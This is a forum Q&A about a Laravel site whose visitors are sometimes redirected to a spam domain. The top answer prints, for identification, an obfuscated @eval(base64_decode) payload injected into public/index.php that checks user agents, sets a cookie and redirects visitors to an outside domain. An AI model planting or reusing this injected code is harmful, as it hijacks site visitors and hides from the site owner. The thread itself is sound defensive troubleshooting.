# C-Panel / VM / Laravel Error - when opening the "https://example.com" it gets redirect to "allowandgo.com/?p=gm3ggojwgq5gi3bphezda" this URL

Tags: laravel, nginx, centos

When I Try to open my site eg:https://example.com, It redirects to "[allowandgo.com/?p=gm3ggojwgq5gi3bphezda](https://allowandgo.com/?p=gm3ggojwgq5gi3bphezda)" URL. Then, It redirects to google.com. After that again I enter "https://example.com", it opens this time.

Need help on this issue.

VM: Centos, Nginx server running Laravel 8.17 and php 7.3.
If more detail needed happy to share it.

Comment: either one of those. Or you machine is infected with this ad-aware (but you should be redirected accessing another sites as well) or your site got hacked (probably with javascript injection). If it's only in your site, try to recompile the assets (npm run prod) and check the diff between the two files

Comment: Thank you for the answer. I help alot. Now how do I prevent this attack or issue?

Comment: you have to find out how you got hacked .... an older version of laravel, an upload form in your site, etc ...

Answer (score 3):

LARAVEL USERS

You have not prevented the attack yet until you check this.

A base64 code was injected at the upper part of your index.php file that is located in your public folder. Please remove that malicious code or comment it. Otherwise, you will just be infecting your audience browsers and system.

A sample of the malicious code is this

/*aeR4Choc_start*/ @eval(base64_decode('aWYoIWRlZmluZWQoImNoYWVKb3U3IikpewogICAgZGVmaW5lKCJjaGFlSm91NyIsIDEpOwogICAgZnVuY3Rpb24gaXNNb2JpbGUoJHVhZ2VudFN0cil7CiAgICAgICAgaWYoc3RycG9zKCR1YWdlbnRTdHIsICdhbmRyb2lkJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnYmxhY2tiZXJyeScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2lwaG9uZScpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2lwYWQnKSAhPT0gZmFsc2UKICAgICAgICAgICAgfHwgc3RycG9zKCR1YWdlbnRTdHIsICdpcG9kJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnb3BlcmEgbWluaScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2llTW9iaWxlJykgIT09IGZhbHNlKXsKICAgICAgICAgICAgcmV0dXJuIHRydWU7CiAgICAgICAgfQogICAgICAgIHJldHVybiBmYWxzZTsKICAgIH0KCiAgICBmdW5jdGlvbiBpc0Rlc2t0b3AoJHVhZ2VudFN0cil7CiAgICAgICAgaWYoc3RycG9zKCR1YWdlbnRTdHIsICdlZGdlJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnbXNpZScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ29wcicpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2Nocm9taXVtJykgIT09IGZhbHNlCiAgICAgICAgICAgIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnZmlyZWZveCcpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2Nocm9tZScpICE9PSBmYWxzZSl7CiAgICAgICAgICAgIHJldHVybiB0cnVlOwogICAgICAgIH0KICAgICAgICByZXR1cm4gZmFsc2U7CiAgICB9CgogICAgJHJlZGlyVG8gPSAiaHR0cHM6Ly93d3cucm94b2Vub3MueHl6LyI7CiAgICAkY2hlY2tDb29rUmVkaXJTdHIgPSAiYWVOZWU4cGkiOwogICAgJHJlZGlyZWN0QWxsb3cgPSB0cnVlOwogICAgZm9yZWFjaCAoJF9DT09LSUUgYXMgJGNvb2tLZXk9PiRjb29rVmFsKXsKICAgICAgICBpZiAoc3RycG9zKCRjb29rS2V5LCAnd29yZHByZXNzX2xvZ2dlZF9pbicpICE9PSBmYWxzZSB8fCAkY29va0tleSA9PSAkY2hlY2tDb29rUmVkaXJTdHIpIHsKICAgICAgICAgICAgJHJlZGlyZWN0QWxsb3121cgPSBmYWxzZTsKICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQogICAgfQoKICAgICR1YWdlbnQgPSBzdHJ0b2xvd2VyKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSk7CgogICAgaWYgKCRyZWRpcmVjdEFsbG93KXsKICAgICAgICBpZihpc01vYmlsZSgkdWFnZW50KSB8fCBpc0Rlc2t0b3AoJHVhZ2VudCkpIHsKICAgICAgICAgICAgc2V0Y29va2llKCRjaGVja0Nvb2tSZWRpclN0ciwgIjEiLCB0aW1lKCkgKyA2MDQ4MDApOwogICAgICAgICAgICBoZWFkZXIoIkxvY2F0aW9uOiAkcmVkaXJUbyIpOwogICAgICAgICAgICBkaWU7CiAgICAgICAgfQogICAgfQp9'));/*aeR4Choc_end*/

Comment: Thank you. I even looked at this file and assumed that this block was put there by Laravel.